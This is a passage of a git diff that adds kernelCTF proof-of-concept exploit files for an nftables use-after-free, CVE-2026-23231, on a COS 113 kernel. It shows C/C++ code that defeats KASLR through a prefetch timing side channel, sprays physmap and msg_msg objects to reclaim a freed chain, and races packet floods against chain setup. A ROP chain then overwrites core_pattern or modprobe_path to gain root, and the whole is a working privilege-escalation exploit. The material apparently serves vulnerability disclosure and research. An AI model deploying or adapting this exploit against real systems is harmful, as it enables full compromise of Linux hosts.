hooks\n"); + return 1; + } + + return run_race_cycle(kva, dur) ? 0 : 1; +} + +static int run_fresh_candidate(uint64_t kva, int dur) { + g_page_kva = kva; + if (!use_userblob) + physmap_fill_rop(); + + pid_t child = fork(); + if (child < 0) + die("fork candidate"); + if (child == 0) + _exit(race_candidate_child(kva, dur)); + + int polls = ((dur + WORKER_GRACE_SEC) * 1000 + 1999) / 2000; + for (int t = 0; t < polls; t++) { + sleep_ms(2000); + + if (try_trigger()) { + kill(child, SIGKILL); + waitpid(child, NULL, 0); + return 1; + } + + int status; + pid_t p = waitpid(child, &status, WNOHANG); + if (p > 0) { + int exit_status = WIFEXITED(status) ? WEXITSTATUS(status) : -1; + int term_sig = WIFSIGNALED(status) ? 
WTERMSIG(status) : 0; + printf("[*] candidate child exited (status=%d sig=%d)\n", + exit_status, term_sig); + if (exit_status == 0 || try_trigger()) + return 1; + break; + } + } + + kill(child, SIGTERM); + sleep_ms(500); + kill(child, SIGKILL); + waitpid(child, NULL, 0); + + return try_trigger(); +} + +static uint64_t mix64_u64(uint64_t x) { + x ^= x >> 33; + x *= 0xff51afd7ed558ccdULL; + x ^= x >> 33; + x *= 0xc4ceb9fe1a85ec53ULL; + x ^= x >> 33; + return x; +} + +static int select_timed_init_alias_offsets(uint64_t *offs, int max, + uint64_t init_size) { +#ifdef __x86_64__ + uint64_t best_score[INIT_ALIAS_CANDS]; + uint64_t best_time[INIT_ALIAS_CANDS]; + uint64_t best_key[INIT_ALIAS_CANDS]; + uint64_t best_off[INIT_ALIAS_CANDS]; + + if (max > INIT_ALIAS_CANDS) + max = INIT_ALIAS_CANDS; + for (int i = 0; i < max; i++) { + best_score[i] = 0; + best_time[i] = 0; + best_key[i] = ~0ULL; + best_off[i] = ~0ULL; + } + + int intel = prefetch_cpu_is_intel(); + cpu_set_t oldset; + int have_old = 0; + pin_prefetch_cpu(&oldset, &have_old); + + for (uint64_t off = 0; off + 0x1000 <= init_size; off += 0x1000) { + uint64_t kva = kbase + OFF_INIT_BEGIN + off; + uint64_t t; + if (intel) + t = prefetch_measure_min(kva, INIT_TIMING_PROBES, 0); + else + t = prefetch_measure_tries(kva, INIT_TIMING_PROBES); + + uint64_t score = intel ? 
(~t) : t; + uint64_t key = mix64_u64(off ^ 0x9e3779b97f4a7c15ULL); + + for (int i = 0; i < max; i++) { + if (score < best_score[i]) + continue; + if (score == best_score[i] && key >= best_key[i]) + continue; + for (int j = max - 1; j > i; j--) { + best_score[j] = best_score[j - 1]; + best_time[j] = best_time[j - 1]; + best_key[j] = best_key[j - 1]; + best_off[j] = best_off[j - 1]; + } + best_score[i] = score; + best_time[i] = t; + best_key[i] = key; + best_off[i] = off; + break; + } + } + + restore_prefetch_cpu(&oldset, have_old); + + int added = 0; + for (int i = 0; i < max; i++) { + if (best_off[i] == ~0ULL) + continue; + offs[added++] = best_off[i]; + } + + if (added > 0) { + printf("[*] __init timing-ranked candidates selected: %d " + "(%s timing)\n", added, intel ? "low" : "high"); + for (int i = 0; i < added; i++) + printf("[*] rank %d: off=%#lx t=%lu\n", + i + 1, (unsigned long)best_off[i], + (unsigned long)best_time[i]); + } + return added; +#else + (void)offs; + (void)max; + (void)init_size; + return 0; +#endif +} + +static int try_init_alias_candidates(void) { + uint64_t init_size = OFF_INIT_END - OFF_INIT_BEGIN; + uint64_t offsets[INIT_ALIAS_CANDS]; + int ncands = select_timed_init_alias_offsets(offsets, INIT_ALIAS_CANDS, + init_size); + uint64_t step = 0; + + if (ncands <= 0) { + ncands = INIT_ALIAS_CANDS; + step = (init_size / INIT_ALIAS_CANDS) & ~0xFFFULL; + if (step < 0x1000) + step = 0x1000; + for (int i = 0; i < ncands; i++) { + uint64_t off = (uint64_t)i * step; + if (off + OFF_INIT_BEGIN >= OFF_INIT_END) + off = init_size - 0x1000; + offsets[i] = off; + } + } + + printf("[*] phase0: __init alias candidates=%d range=%#lx-%#lx " + "step=%#lx dur=%ds\n", + ncands, + (unsigned long)(kbase + OFF_INIT_BEGIN), + (unsigned long)(kbase + OFF_INIT_END), + (unsigned long)step, INIT_ALIAS_SEC); + + for (int i = 0; i < ncands; i++) { + uint64_t off = offsets[i]; + uint64_t kva = kbase + OFF_INIT_BEGIN + off; + printf("[*] phase0 cand %d/%d: kva=%#lx 
(__init+%#lx)\n", + i + 1, ncands, (unsigned long)kva, + (unsigned long)off); + if (run_fresh_candidate(kva, INIT_ALIAS_SEC)) + return 1; + } + + return 0; +} + +/* + * The kernelCTF vuln-verify job runs '/exp --vuln-trigger' under KASAN, + * nokaslr, and a 3 minute outer timeout. It only drives the vulnerable + * packet-path condition and does not reclaim the freed chain, so KASAN sees + * the nft_do_chain() UAF directly on vulnerable kernels. + */ +static int vuln_trigger_main(void) { + printf("[*] vuln-trigger: packet-path UAF reachability only\n"); + printf("[*] vuln-trigger: setting up user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) + die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] vuln-trigger: failed to saturate hooks\n"); + return 1; + } + + printf("[*] vuln-trigger: racing INET NEWCHAIN for %ds " + "(%d floods, KASAN no-reclaim)\n", + VULN_TRIGGER_SECONDS, VULN_TRIGGER_FLOODS); + + race_running = 1; + race_won = 0; + + pthread_t t_flood[VULN_TRIGGER_FLOODS]; + pthread_t t_race; + for (long i = 0; i < VULN_TRIGGER_FLOODS; i++) + pthread_create(&t_flood[i], NULL, udp_flood_thread, NULL); + pthread_create(&t_race, NULL, inet_race_thread, NULL); + + time_t start = time(NULL); + int last_log = -1; + while (time(NULL) - start < VULN_TRIGGER_SECONDS) { + sleep_ms(1000); + int elapsed = (int)(time(NULL) - start); + if (elapsed / VULN_TRIGGER_LOG_EVERY != last_log) { + last_log = elapsed / VULN_TRIGGER_LOG_EVERY; + printf("[*] vuln-trigger: %ds elapsed\n", elapsed); + } + } + + race_running = 0; + for (int i = 0; i < VULN_TRIGGER_FLOODS; i++) + pthread_join(t_flood[i], NULL); + pthread_join(t_race, NULL); + + printf("[-] vuln-trigger: no KASAN report observed\n"); + return 1; +} + +static int exploit_main(void) { + if (use_userblob) { + /* SMAP off: use userspace blob, no physmap needed */ + printf("[*] userblob mode (no physmap needed)\n"); + setup_userblob(); + } else { + /* SMAP on: need physmap spray */ + printf("[*] physmap 
spray (%d MB)\n", physmap_mb); + physmap_spray(); + } + + int have_pagemap = 0; + if (use_userblob) { + g_page_kva = USERBLOB_ADDR; + have_pagemap = 1; /* treat as known address */ + } else { + g_page_kva = read_physmap_kva(); + if (g_page_kva) { + have_pagemap = 1; + printf("[+] page_kva=%#lx (from pagemap)\n", + (unsigned long)g_page_kva); + } else { + printf("[!] pagemap unavailable\n"); + } + } + + if (have_pagemap) { + printf("[*] setting up user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] failed to saturate hooks\n"); + return 1; + } + + /* Exact address known (pagemap or userblob) -- run one long cycle */ + if (!use_userblob) + physmap_fill_rop(); + spray_msgs(g_page_kva); + + int timeout = use_userblob ? RACE_DURATION_SEC * 10 + : RACE_DURATION_SEC * 3; + printf("[*] starting race (timeout=%ds)...\n", timeout); + race_running = 1; + race_won = 0; + + pthread_t t_flood, t_race, t_spray; + pthread_create(&t_flood, NULL, udp_flood_thread, NULL); + pthread_create(&t_spray, NULL, dedicated_spray_thread, + (void*)(uintptr_t)g_page_kva); + pthread_create(&t_race, NULL, inet_race_thread, + (void*)(uintptr_t)g_page_kva); + + time_t start = time(NULL); + while (time(NULL) - start < timeout && !race_won) { + sleep_ms(2000); + if (try_trigger()) { race_won = 1; break; } + } + race_running = 0; + pthread_join(t_flood, NULL); + pthread_join(t_race, NULL); + pthread_join(t_spray, NULL); + + if (!race_won && try_trigger()) race_won = 1; + if (race_won) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 0; + } + free_spray(); + /* If userblob mode fails, we can't fall back to physmap */ + if (use_userblob) { + printf("[-] userblob race did not win\n"); + return 1; + } + printf("[-] exact KVA race did not win\n"); + return 1; + } + + /* + * KVA offset strategy: pagemap is unavailable in the runner.
First try + * kbase-relative __init aliases as in the 521.98 exploit, then fall + * back to direct-map guesses. Each guessed KVA gets a fresh child so + * namespace and nft state do not accumulate across candidates. + */ + if (try_init_alias_candidates()) + return 0; + + uint64_t primary_offsets[] = { + 0x50000000ULL, /* 1.25 GB */ + 0x30000000ULL, /* 0.75 GB */ + 0x60000000ULL, /* 1.5 GB */ + 0x40000000ULL, /* 1.0 GB */ + 0x80000000ULL, /* 2.0 GB */ + 0x20000000ULL, /* 0.5 GB */ + 0x78000000ULL, /* 1.875 GB */ + 0x90000000ULL, /* 2.25 GB */ + 0xa0000000ULL, /* 2.5 GB */ + 0x70000000ULL, /* 1.75 GB */ + }; + + printf("[*] phase1: primary phbase=%#lx, %zu KVAs [0.5-2.5GB]\n", + (unsigned long)phbase, + sizeof(primary_offsets) / sizeof(primary_offsets[0])); + + for (size_t i = 0; i < sizeof(primary_offsets) / sizeof(primary_offsets[0]); i++) { + if (run_fresh_candidate(phbase + primary_offsets[i], + RACE_DURATION_SEC)) + return 0; + } + + size_t max_alt = n_phbase_cands < 5 ? n_phbase_cands : 5; + for (size_t i = 1; i < max_alt; i++) { + uint64_t pb = phbase_cands[i]; + long delta_mb = (long)((int64_t)(pb - phbase) >> 20); + printf("[*] phase2: alt phbase=%#lx (%+ldMB)\n", + (unsigned long)pb, delta_mb); + if (run_fresh_candidate(pb + 0x60000000ULL, + RACE_DURATION_SEC)) + return 0; + } + + printf("[-] exploit failed\n"); + return 1; +} + +/* ================================================================ + * TEST_ROP mode -- verify ROP blob and spray layout offline + * ================================================================ */ +static void test_rop_mode(void) { + printf("[*] TEST_ROP mode: verifying blob and spray layout\n"); + + /* Use dummy addresses if not provided */ + if (!kbase) kbase = 0xffffffff81000000ULL; + if (!phbase) phbase = 0xffff888000000000ULL; + g_page_kva = phbase + 0x10000000ULL; /* arbitrary */ + + printf("[*] kbase = %#lx\n", (unsigned long)kbase); + printf("[*] phbase = %#lx\n", (unsigned long)phbase); + printf("[*] page_kva = 
%#lx\n", (unsigned long)g_page_kva); + + /* Build and dump ROP blob */ + uint8_t blob[256]; + memset(blob, 0, sizeof(blob)); + build_blob(blob, g_page_kva); + + printf("\n[*] ROP blob layout (0x98 bytes):\n"); + printf(" +0x000 blob_size = %#lx\n", + *(uint64_t*)(blob + 0x000)); + printf(" +0x008 rdp0 = %#lx (dlen=%lu)\n", + *(uint64_t*)(blob + 0x008), + *(uint64_t*)(blob + 0x008) >> 1); + printf(" +0x010 expr0.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x010)); + printf(" +0x018 expr0.d[0] = %#lx (pop_rsi_rdi)\n", + *(uint64_t*)(blob + 0x018)); + printf(" +0x020 expr0.d[1] = %#lx (src_va = page_kva+0x%x)\n", + *(uint64_t*)(blob + 0x020), PATH_OFFSET); + printf(" +0x028 dreg=%-3u len=%u\n", blob[0x028], blob[0x029]); + printf(" +0x030 expr1.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x030)); + printf(" +0x038 expr1.d[0] = %#lx (%s)\n", + *(uint64_t*)(blob + 0x038), + use_core_pattern ? "core_pattern" : "modprobe_path"); + printf(" +0x040 expr1.d[1] = %#lx (strcpy)\n", + *(uint64_t*)(blob + 0x040)); + printf(" +0x048 dreg=%-3u len=%u\n", blob[0x048], blob[0x049]); + printf(" +0x050 expr2.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x050)); + printf(" +0x058 expr2.d[0] = %#lx (pop_rdi)\n", + *(uint64_t*)(blob + 0x058)); + printf(" +0x060 expr2.d[1] = %#lx (100000)\n", + *(uint64_t*)(blob + 0x060)); + printf(" +0x068 dreg=%-3u len=%u\n", blob[0x068], blob[0x069]); + printf(" +0x070 expr3.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x070)); + printf(" +0x078 expr3.d[0] = %#lx (msleep)\n", + *(uint64_t*)(blob + 0x078)); + printf(" +0x080 expr3.d[1] = %#lx (return_thunk)\n", + *(uint64_t*)(blob + 0x080)); + printf(" +0x088 dreg=%-3u len=%u\n", blob[0x088], blob[0x089]); + printf(" +0x090 rdp1 = %#lx (end marker)\n", + *(uint64_t*)(blob + 0x090)); + + /* Build and dump msg_msg spray */ + size_t bufsz = sizeof(long) + MTEXT_SZ; + char *msgbuf = calloc(1, bufsz); + build_spray_msg(msgbuf, g_page_kva); + char *mtext = 
msgbuf + sizeof(long); + + printf("\n[*] msg_msg spray layout (mtext offsets):\n"); + uint64_t bg0, bg1; + memcpy(&bg0, mtext + (ALLOC_BLOB_GEN0 - MSG_HDR_SZ), 8); + memcpy(&bg1, mtext + (ALLOC_BLOB_GEN1 - MSG_HDR_SZ), 8); + printf(" mtext[%d] (alloc+%d) policy = %u (expect 1=NF_ACCEPT)\n", + ALLOC_POLICY - MSG_HDR_SZ, ALLOC_POLICY, + (unsigned)mtext[ALLOC_POLICY - MSG_HDR_SZ]); + printf(" mtext[%d] (alloc+%d) blob_gen_0 = %#lx\n", + ALLOC_BLOB_GEN0 - MSG_HDR_SZ, ALLOC_BLOB_GEN0, + (unsigned long)bg0); + printf(" mtext[%d] (alloc+%d) blob_gen_1 = %#lx\n", + ALLOC_BLOB_GEN1 - MSG_HDR_SZ, ALLOC_BLOB_GEN1, + (unsigned long)bg1); + printf(" mtext[%d] (alloc+%d) flags = 0x%02x (expect 0x01=NFT_CHAIN_BASE)\n", + ALLOC_FLAGS - MSG_HDR_SZ, ALLOC_FLAGS, + (unsigned)mtext[ALLOC_FLAGS - MSG_HDR_SZ]); + + /* Verify consistency */ + int ok = 1; + if (bg0 != g_page_kva) { + printf("[-] MISMATCH: blob_gen_0 != page_kva\n"); ok = 0; + } + if (bg1 != g_page_kva) { + printf("[-] MISMATCH: blob_gen_1 != page_kva\n"); ok = 0; + } + if (mtext[ALLOC_POLICY - MSG_HDR_SZ] != 1) { + printf("[-] MISMATCH: policy != 1\n"); ok = 0; + } + if (mtext[ALLOC_FLAGS - MSG_HDR_SZ] != 0x01) { + printf("[-] MISMATCH: flags != 0x01\n"); ok = 0; + } + + /* Verify expected addresses */ + printf("\n[*] Computed addresses:\n"); + printf(" target (%s) = %#lx\n", + use_core_pattern ? "core_pattern" : "modprobe_path", + (unsigned long)(kbase + (use_core_pattern ? 
OFF_CORE_PATTERN : OFF_MODPROBE))); + printf(" nft_imm_ops = %#lx\n", + (unsigned long)(kbase + OFF_NFT_IMM_OPS)); + printf(" pop_rsi_rdi = %#lx\n", + (unsigned long)(kbase + OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK)); + printf(" strcpy = %#lx\n", + (unsigned long)(kbase + OFF_STRCPY)); + printf(" msleep = %#lx\n", + (unsigned long)(kbase + OFF_MSLEEP)); + printf(" pop_rdi = %#lx\n", + (unsigned long)(kbase + OFF_POP_RDI_JMP_RETURN_THUNK)); + printf(" return_thunk = %#lx\n", + (unsigned long)(kbase + OFF_RETURN_THUNK)); + printf(" src_va (path) = %#lx\n", + (unsigned long)(g_page_kva + PATH_OFFSET)); + + printf("\n[%c] TEST_ROP %s\n", ok ? '+' : '-', + ok ? "PASSED" : "FAILED"); + + free(msgbuf); +} + +/* ================================================================ + * Entry point + * ================================================================ */ +int main(int argc, char **argv) { + /* TEST_ROP mode: verify blob/spray layout without running race */ + if (getenv("TEST_ROP")) { + kbase = env_u64("KBASE"); + phbase = env_u64("PHYSBASE"); + test_rop_mode(); + return 0; + } + + auto_physmap_size(); + + /* Detect SMAP: if off, we can use a userspace blob and skip + * the entire physmap spray + phbase Entrybleed scan. */ + int smap_present = check_smap(); + if (!smap_present) { + printf("[+] SMAP not detected -- using userspace blob\n"); + use_userblob = 1; + } else { + printf("[*] SMAP detected -- using physmap approach\n"); + } + + kbase = env_u64("KBASE"); + phbase = env_u64("PHYSBASE"); + + /* kernelCTF repro with requires_separate_kaslr_leak=true appends + * "nokaslr -- kaslr_leak=1"; init.sh passes the kallsyms text base + * as argv. It does not pass a direct-map base, so derive that from + * nokaslr below. 
*/ + int verifier_trigger_arg = 0; + for (int i = 1; i < argc; i++) { + if (strcmp(argv[i], "--vuln-trigger") == 0) { + verifier_trigger_arg = 1; + continue; + } + if (kbase) + continue; + uint64_t cli_kbase = 0; + if (parse_u64_arg(argv[i], &cli_kbase)) { + if (cli_kbase == 0 && kernel_cmdline_has_token("nokaslr")) { + cli_kbase = KTEXT_SCAN_START; + printf("[*] argv kbase was 0; using nokaslr fallback %#lx\n", + (unsigned long)cli_kbase); + } + kbase = cli_kbase; + printf("[+] argv kbase=%#lx\n", (unsigned long)kbase); + } else { + printf("[!] ignoring unparsable argv kbase: %s\n", argv[i]); + } + } + + if (kernel_cmdline_has_token("nokaslr")) { + if (!kbase) { + kbase = KTEXT_SCAN_START; + printf("[*] nokaslr detected; using fixed kbase=%#lx\n", + (unsigned long)kbase); + } + if (!phbase) { + phbase = DIRECT_MAP_START; + printf("[*] nokaslr detected; using fixed phbase=%#lx\n", + (unsigned long)phbase); + } + } + if (verifier_trigger_arg) { + printf("[*] verifier --vuln-trigger mode enabled\n"); + return vuln_trigger_main(); + } + + if (kbase && phbase) { + n_kbase_cands = 1; + kbase_cands[0] = kbase; + n_phbase_cands = 1; + phbase_cands[0] = phbase; + } + if (use_userblob) { + /* Only need kbase for ROP gadgets, phbase is irrelevant */ + if (!kbase && !do_entrybleed()) + return 1; + if (!kbase) { + printf("[-] Entrybleed failed for kbase\n"); + return 1; + } + phbase = 0xffff888000000000ULL; /* unused but set for safety */ + } else { + if ((!kbase || !phbase) && !do_entrybleed()) + return 1; + if (!kbase || !phbase) { + fprintf(stderr, "[-] need KBASE and PHYSBASE\n"); + return 1; + } + } + printf("[+] kbase = %#lx\n", (unsigned long)kbase); + printf("[+] phbase = %#lx\n", (unsigned long)phbase); + if (use_userblob) + printf("[+] blob = userspace @ %#lx\n", + (unsigned long)USERBLOB_ADDR); + + /* Create payload files BEFORE forking so parent can trigger + * modprobe after the ROP overwrites modprobe_path. 
The ROP + * chain calls msleep(100s) which BUGs "scheduling while atomic" + * but keeps the process alive (unlike do_exit which killed it + * and closed the memfd FDs). */ + setup_payload(); + + pid_t child = fork(); + if (child < 0) die("fork"); + if (child == 0) + _exit(exploit_main()); + + for (int t = 0; t < 300; t++) { + sleep_ms(2000); + + if (try_trigger()) { + printf("\n[+] ===== GOT ROOT =====\n"); + kill(child, SIGKILL); + waitpid(child, NULL, WNOHANG); + return 0; + } + + int status; + pid_t p = waitpid(child, &status, WNOHANG); + if (p > 0) { + printf("[*] child exited (status=%d)\n", + WIFEXITED(status) ? WEXITSTATUS(status) : -1); + for (int i = 0; i < 30; i++) { + if (try_trigger()) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 0; + } + sleep_ms(500); + } + break; + } + } + + kill(child, SIGKILL); + waitpid(child, NULL, 0); + + printf("[-] exploit did not achieve root\n"); + return 1; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit_xdk.cpp b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit_xdk.cpp new file mode 100644 index 000000000..65eaaeb3c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit_xdk.cpp @@ -0,0 +1,2497 @@ +/* + * LPE exploit for cos-113-18244.521.88 (Linux 6.1.155) + * kernelXDK-ported version + * + * Vulnerability: packet-path UAF in nftables via NFPROTO_INET partial hook + * install. IPv4 hook registration succeeds, IPv6 fails with + * -E2BIG -> rollback frees chain/blob immediately while a + * racing packet still dereferences priv->chain in + * nft_do_chain(). + * + * Exploitation: + * 1. Prefetch side-channel KASLR bypass. + * 2. Physmap spray with fake rule blob (ROP via nft_immediate_eval). + * 3. Saturate IPv6 LOCAL_OUT hooks to MAX_HOOK_COUNT (1024). + * 4. 
Race: UDP flood + INET basechain create/destroy loop + msg_msg spray + * to reclaim freed nft_base_chain (kmalloc-256) with blob_gen_X -> + * physmap page. + * 5. ROP: strcpy(core_pattern, "|/bin/dd ...") -> msleep(~forever). + * 6. Trigger core dump -> flag on serial console. + */ +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* kernelXDK headers */ +#include +#include + +/* Embed the KXDB target database into the binary */ +INCBIN(target_db, "target_db.kxdb"); +/* xdk INCBIN macro leaves the assembler section in .bss; restore .text. */ +__asm__(".text\n"); + +/* ================================================================ + * Protocol constants + * ================================================================ */ +#ifndef NFPROTO_UNSPEC +#define NFPROTO_UNSPEC 0 +#endif +#ifndef NFPROTO_INET +#define NFPROTO_INET 1 +#endif +#ifndef NFPROTO_IPV4 +#define NFPROTO_IPV4 2 +#endif +#ifndef NFPROTO_IPV6 +#define NFPROTO_IPV6 10 +#endif +#ifndef NF_INET_LOCAL_OUT +#define NF_INET_LOCAL_OUT 3 +#endif + +/* ================================================================ + * Magic-number constants + * ================================================================ */ +#define RACE_CPU 0 +#define FLOOD_CPU 1 +#define DROP_UID 1000 +#define DROP_GID 1000 +#define NL_BUFSZ (1 << 20) /* 1MB netlink socket buffer */ +#define RACE_NL_BUFSZ (1 << 21) /* 2MB race netlink buffer */ +#define RECV_TIMEOUT_SEC 5 +#define PROGRESS_INTERVAL 128 +#define RACE_PROGRESS_INTERVAL 2000 +#define CHAIN_NAME_MOD 10000 +#define PARENT_POLL_ITERATIONS 300 +#define PARENT_POLL_MS 2000 +#define POST_EXIT_POLLS 30 +#define POST_EXIT_POLL_MS 500 +#define CORE_DUMP_WAIT_MS 2000 +#define MODPROBE_WAIT_MS 500 
+#define MSLEEP_FOREVER 0x7FFFFFFFULL +#define UDP_PORT 12345 +#define VULN_TRIGGER_SECONDS 170 +#define VULN_TRIGGER_LOG_EVERY 10 +#define VULN_TRIGGER_FLOODS 4 +#define BLOB_TOTAL_SIZE 0x98 +#define ENTRYBLEED_SCAN_ROUNDS 256 +#define ENTRYBLEED_REFINE_ROUNDS 384 +#define ENTRYBLEED_DUMMY_ITERS 3 +#define THRESHOLD_HIGH 1.1 +#define THRESHOLD_LOW 0.9 +#define EB_COARSE_RANGE 0x40000000ULL +#define EB_COARSE_STEP 0x200000ULL +#define EB_REFINE_RANGE 0x2000000ULL +#define PH_COARSE_RANGE 0x400000000000ULL +#define PH_COARSE_STEP 0x40000000ULL +#define PH_COARSE_ITERS 50 +#define PH_REFINE_ITERS 100 +#define FLOOD_YIELD_INTERVAL 8 + +/* ================================================================ + * Kernel symbol offsets -- resolved at runtime from kernelXDK + * + * Fallback values are for cos-113-18244.521.88 vmlinux if the + * KXDB database does not contain the target or symbol. + * ================================================================ */ +static uint64_t off_modprobe = 0x2a76a20; +static uint64_t off_core_pattern = 0x2bb9ec0; +static uint64_t off_page_offset = 0x21ac9a0; +static uint64_t off_nft_imm_ops = 0x1d433e0; +static uint64_t off_entry_syscall = 0x1400080; +static uint64_t off_init_begin = 0x345c000; +static uint64_t off_init_end = 0x36de000; + +/* + * cos-113-18244.521.88 vmlinux ROP gadgets. + * These are not kernel symbols, so they are intentionally not registered in + * the XDK TargetDb. Keep them as documented target-specific gadget offsets. 
+ */ +/* 0xffffffff81afc2d1: pop rsi ; pop rdi ; jmp __x86_return_thunk */ +#define OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK 0xafc2d1ULL +/* 0xffffffff81195d8c: pop rdi ; jmp __x86_return_thunk */ +#define OFF_POP_RDI_JMP_RETURN_THUNK 0x195d8cULL +/* cos-113-18244.521.88 vmlinux symbols */ +/* strcpy (kernel internal) */ +static uint64_t off_strcpy = 0x12b59f0; +/* msleep - schedule timeout */ +static uint64_t off_msleep = 0x243850; +/* __x86_return_thunk - retpoline return */ +static uint64_t off_return_thunk = 0x16054b0; + +/* ================================================================ + * nft_base_chain layout -- resolved from kernelXDK struct info + * or hardcoded fallback for cos-113 + * + * nft_base_chain is ~216 bytes -> kmalloc-256 + * +64: basechain.policy (u8, need NF_ACCEPT = 1) + * +80: chain.blob_gen_0 (ptr) + * +88: chain.blob_gen_1 (ptr) + * +164: chain.flags byte (need bit 0 set = NFT_CHAIN_BASE) + * ================================================================ */ +static uint64_t NFT_BASE_CHAIN_OFFS_BLOB_GEN0 = 80; +static uint64_t NFT_BASE_CHAIN_OFFS_BLOB_GEN1 = 88; +static uint64_t NFT_BASE_CHAIN_OFFS_POLICY = 64; +static uint64_t NFT_BASE_CHAIN_OFFS_FLAGS = 164; +static uint64_t MSG_MSG_SIZE = 48; /* sizeof(struct msg_msg) */ + +/* ================================================================ + * Register custom target data for symbols/structs not in the + * standard KXDB database + * ================================================================ */ +static void register_custom_targets(TargetDb &kxdb) { + Target ct("kernelctf", "cos-113-18244.521.88"); + + /* Symbols specific to cos-113-18244.521.88 vmlinux */ + ct.AddSymbol("core_pattern", 0x2bb9ec0); + ct.AddSymbol("modprobe_path", 0x2a76a20); + ct.AddSymbol("page_offset_base", 0x21ac9a0); + ct.AddSymbol("nft_immediate_ops", 0x1d433e0); + ct.AddSymbol("entry_SYSCALL_64", 0x1400080); + ct.AddSymbol("__init_begin", 0x345c000); + ct.AddSymbol("__init_end", 0x36de000); + 
ct.AddSymbol("strcpy", 0x12b59f0); + ct.AddSymbol("__x86_return_thunk", 0x16054b0); + + /* nft_base_chain layout (kmalloc-256) */ + ct.AddStruct("nft_base_chain", 256, { + {"policy", 64, 1}, + {"chain.blob_gen_0", 80, 8}, + {"chain.blob_gen_1", 88, 8}, + {"chain.flags", 164, 1}, + }); + + kxdb.AddTarget(ct); +} + +/* + * Resolve all offsets from the kernelXDK target database. + * Falls back to hardcoded cos-113 values if a symbol is missing. + */ + +static uint64_t try_get_symbol(Target &target, const char *name, + uint64_t fallback) { + try { + uint64_t off = target.GetSymbolOffset(name); + if (off != 0) return off; + } catch (...) {} + printf("[*] xdk: symbol '%s' not in KXDB, using fallback %#lx\n", + name, (unsigned long)fallback); + return fallback; +} + +static uint64_t try_get_field(Target &target, const char *sname, + const char *fname, uint64_t fallback) { + try { + return target.GetFieldOffset(sname, fname); + } catch (...) {} + return fallback; +} + +static uint64_t try_get_struct_size(Target &target, const char *sname, + uint64_t fallback) { + try { + return target.GetStructSize(sname); + } catch (...) 
{} + return fallback; +} + +static void xdk_init_offsets(void) { + try { + TargetDb kxdb("target_db.kxdb", target_db); + register_custom_targets(kxdb); + + auto target = kxdb.AutoDetectTarget(); + printf("[+] xdk: detected target: %s %s\n", + target.GetDistro().c_str(), + target.GetReleaseName().c_str()); + + /* Resolve symbol offsets */ + off_core_pattern = try_get_symbol(target, "core_pattern", off_core_pattern); + off_modprobe = try_get_symbol(target, "modprobe_path", off_modprobe); + off_page_offset = try_get_symbol(target, "page_offset_base", off_page_offset); + off_nft_imm_ops = try_get_symbol(target, "nft_immediate_ops", off_nft_imm_ops); + off_entry_syscall = try_get_symbol(target, "entry_SYSCALL_64", off_entry_syscall); + off_init_begin = try_get_symbol(target, "__init_begin", off_init_begin); + off_init_end = try_get_symbol(target, "__init_end", off_init_end); + off_strcpy = try_get_symbol(target, "strcpy", off_strcpy); + off_msleep = try_get_symbol(target, "msleep", off_msleep); + off_return_thunk = try_get_symbol(target, "__x86_return_thunk", off_return_thunk); + + /* Resolve struct offsets */ + MSG_MSG_SIZE = try_get_struct_size(target, "msg_msg", MSG_MSG_SIZE); + NFT_BASE_CHAIN_OFFS_BLOB_GEN0 = try_get_field(target, "nft_base_chain", + "chain.blob_gen_0", NFT_BASE_CHAIN_OFFS_BLOB_GEN0); + NFT_BASE_CHAIN_OFFS_BLOB_GEN1 = try_get_field(target, "nft_base_chain", + "chain.blob_gen_1", NFT_BASE_CHAIN_OFFS_BLOB_GEN1); + NFT_BASE_CHAIN_OFFS_POLICY = try_get_field(target, "nft_base_chain", + "policy", NFT_BASE_CHAIN_OFFS_POLICY); + NFT_BASE_CHAIN_OFFS_FLAGS = try_get_field(target, "nft_base_chain", + "chain.flags", NFT_BASE_CHAIN_OFFS_FLAGS); + + printf("[+] xdk: all offsets resolved\n"); + } catch (std::exception &e) { + printf("[!] 
xdk init failed: %s -- using hardcoded cos-113 offsets\n", + e.what()); + } +} + +/* MFD_EXEC was added in kernel 6.3 */ +#ifndef MFD_EXEC +#define MFD_EXEC 0x0010U +#endif + +/* + * nft_do_chain stack frame (6.1.155): + * sub $0x220, %rsp; 6 pushes = 48 bytes + * regs at rsp+0x48 + * return address at rsp+0x250 + * dreg for ret addr = (0x250 - 0x48) / 4 = 130 + */ +#define DREG_RET 130 +#define DREG_RET4 134 +#define DREG_RET8 138 +#define DREG_RET12 142 + +/* ---------- tuning ---------- */ +#define IPV6_SATURATE_MAX 1100 +#define NUM_SPRAY_QS 256 +#define MSGS_PER_Q 4 +#define RACE_DURATION_SEC 30 +#define PHYSMAP_MB 2560 +#define INIT_ALIAS_CANDS 26 +#define INIT_ALIAS_SEC 20 +#define INIT_TIMING_PROBES 8 +#define WORKER_GRACE_SEC 6 +#define PATH_OFFSET 0x100 +#define MAX_KBASE_CANDS 40 +#define MAX_PHBASE_CANDS 20 +#define KVA_CYCLE_ROUNDS 20 +#define USERBLOB_ADDR 0x13370000ULL + +/* ---------- globals ---------- */ +static uint64_t kbase = 0; +static uint64_t phbase = 0; +static int physmap_mb = PHYSMAP_MB; +static uint64_t g_page_kva = 0; +static void *phys_region = nullptr; +static volatile int race_running = 0; +static volatile int race_won = 0; +static int use_userblob = 0; + +/* 